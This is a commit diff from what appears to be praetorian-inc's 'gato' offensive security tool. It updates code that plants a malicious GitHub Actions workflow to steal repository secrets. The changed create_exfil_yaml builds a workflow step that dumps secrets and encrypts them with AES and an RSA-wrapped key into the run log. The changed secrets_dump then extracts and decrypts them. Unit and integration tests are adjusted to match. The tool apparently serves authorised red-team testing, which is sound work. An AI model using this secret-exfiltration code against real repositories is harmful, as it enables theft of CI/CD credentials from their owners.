Merge branch 'dev' into update/integration_test_improvement

praetorian-inc · Nov 18, 2023 · ab923f7 · ab923f7
2 parents ff68447 + 80e1b56
commit ab923f7
Show file tree

Hide file tree

Showing 4 changed files with 40 additions and 19 deletions.
diff --git a/gato/attack/attack.py b/gato/attack/attack.py
@@ -9,6 +9,11 @@
 from cryptography.hazmat.primitives import serialization
 from cryptography.hazmat.primitives.asymmetric import rsa
 from cryptography.hazmat.primitives.asymmetric import padding
+from cryptography.hazmat.primitives.ciphers import Cipher
+from cryptography.hazmat.primitives.ciphers import algorithms
+from cryptography.hazmat.primitives.ciphers import modes
+
+import hashlib
 
 from gato.github import Api
 from gato.git import Git
@@ -548,20 +553,36 @@ def secrets_dump(
                 print(res)
 
                 # Parse out the base64 blob with a regex.
-                matcher = re.compile(r'(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)')
+                matcher = re.compile(
+                              r'\$(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?\$'
+                          )
 
                 blob = matcher.findall(res)
 
                 if len(blob) == 2:
-                    encrypted_secrets = base64.b64decode(blob[1])
-                    Output.owned(
-                        "Decrypted and Decoded Secrets:\n"
-                    )
+                    encrypted_secrets = base64.b64decode(blob[0][1:-1])
+                    salt = encrypted_secrets[8:16]
+                    ciphertext = encrypted_secrets[16:]
+
+                    encrypted_key = base64.b64decode(blob[1][1:-1])
+                    sym_key_b64 = priv_key.decrypt(encrypted_key,
+                                                   padding.PKCS1v15()).decode()
+                    sym_key = base64.b64decode(sym_key_b64)
+
+                    derived_key = hashlib.pbkdf2_hmac('sha256', sym_key, salt, 10000, 48)
+                    key = derived_key[0:32]
+                    iv = derived_key[32:48]
+
+                    cipher = Cipher(algorithms.AES256(key), modes.CBC(iv))
+                    decryptor = cipher.decryptor()
+
+                    Output.owned("Decrypted and Decoded Secrets:")
+
+                    cleartext = decryptor.update(ciphertext) + decryptor.finalize()
+                    cleartext = cleartext[:-cleartext[-1]]
 
-                    plaintext = priv_key.decrypt(encrypted_secrets,
-                                                 padding.PKCS1v15()).decode()
+                    print(cleartext.decode('utf-8').strip())
 
-                    print(plaintext)
                 else:
                     Output.error(
                         "Unable to extract encoded output from runlog!"

diff --git a/gato/attack/cicd_attack.py b/gato/attack/cicd_attack.py
@@ -94,7 +94,8 @@ def create_exfil_yaml(secrets: list, pubkey: str, branch_name):
 
         echo_cmd += '"'
 
-        pkey_varname = f'{branch_name}_KEY'
+        # variables don't support hyphens, so replace them with underscores.
+        pkey_varname = f'{branch_name.replace("-", "_")}_KEY'
         secret_envmap[pkey_varname] = pubkey
 
         yaml_file['name'] = branch_name
@@ -106,9 +107,13 @@ def create_exfil_yaml(secrets: list, pubkey: str, branch_name):
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': f"{echo_cmd} | openssl rsautl -encrypt -inkey"
-                           f" <(echo \"${pkey_varname}\") -pubin -pkcs |"
-                           " base64 -w 0"
+                    'run': "openssl rand -out sym.key 32; echo -n '$';"
+                           f"{echo_cmd} | openssl enc -aes-256-cbc -kfile "
+                           "sym.key -pbkdf2 | base64 -w 0 | tr -d '\\n';"
+                           f"echo '$'; echo -n '$'; cat sym.key | base64 | "
+                           "openssl rsautl -encrypt -inkey "
+                           f"<(echo \"${pkey_varname}\") -pubin -pkcs | "
+                           "base64 -w 0 | tr -d '\\n'; echo '$'"
                 }
             ]
         }

diff --git a/test/test_cases.json b/test/test_cases.json
@@ -348,10 +348,6 @@
                 "expect": "The malicious workflow executed succesfully!",
                 "type": "stdout"
             },
-            {
-                "expect": "Run echo -e \"DUMMY_TEST_SECRET=$DUMMY_TEST_SECRET \\n\" | openssl rsautl -encrypt -inkey <(echo",
-                "type": "stdout"
-            },
             {
                 "expect": "The repository has 1 accessible secret(s)!",
                 "type": "stdout"
@@ -386,4 +382,4 @@
         ],
         "extra_validation": {"type":"none"}
     }
-]
+]
diff --git a/unit_test/test_cicd_attack.py b/unit_test/test_cicd_attack.py
@@ -43,5 +43,4 @@ def test_create_secret_exil_yaml():
 
     assert "SECRET_ONE: ${{ secrets.SECRET_ONE }}" in yaml
     assert "SECRET_TWO: ${{ secrets.SECRET_TWO }}" in yaml
-    assert "run: echo -e \"SECRET_ONE=$SECRET_ONE \\nSECRET_TWO" \
-           "=$SECRET_TWO \\n\" | openssl" in yaml
+    assert "echo -e \"SECRET_ONE=$SECRET_ONE\n" in yaml